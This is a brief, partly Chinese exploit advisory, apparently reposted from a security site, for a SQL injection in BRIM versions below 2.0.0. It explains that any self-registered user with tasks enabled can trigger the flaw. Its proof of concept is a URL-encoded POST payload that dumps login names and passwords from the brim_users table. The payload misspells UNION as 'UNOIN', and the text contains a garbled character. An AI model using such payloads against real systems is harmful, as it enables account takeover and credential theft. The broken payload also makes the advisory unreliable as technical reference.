BRIM < 2.0.0 SQL注射信息 标题: BRIM < 2.0.0 SQL Injection 作者: ifnull www.2cto.com 测试平台: Apache/2.2.3, PHP /5.1.6, MySQL 5.0.45 �尽管它可以在任何环境下运行. Example uses MySQL 5 query escape but can easily be ported to prior versions of MySQL. 描述: Unlike CVE-2008-4082, this will work with or without magic_quotes_gpc enabled. Like the last exploit however, you must first create an account and enable "tasks". By default anyone can create an account and the accounts are automatically approved. 程序信息 版本: < 2.0.0 地址: http://sourceforge.net/projects/brim/ 描述: BRIM is a MVC framework, written in PHP and based on items with a hierarchical relationship. The list of plugins make BRIM a Information Manager with plugins like bookmarks, a calendar, contacts tasks, notes, RSS etc. www.2cto.com The application is multilingual. Proof of ConceptPOST URI: /index.php Data: plugin=tasks&field=1%3D1%20UNOIN%20SELECT%201%2C2%2C3%2C4%2CCONCAT(loginname%2C0x3a%2Cpassword)%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%20from%20brim_users--&value=asdf&action=searchTasks
查看更多关于BRIM < 2.0.0 SQL注射缺陷及修复 - 网站安全 - 自学的详细内容...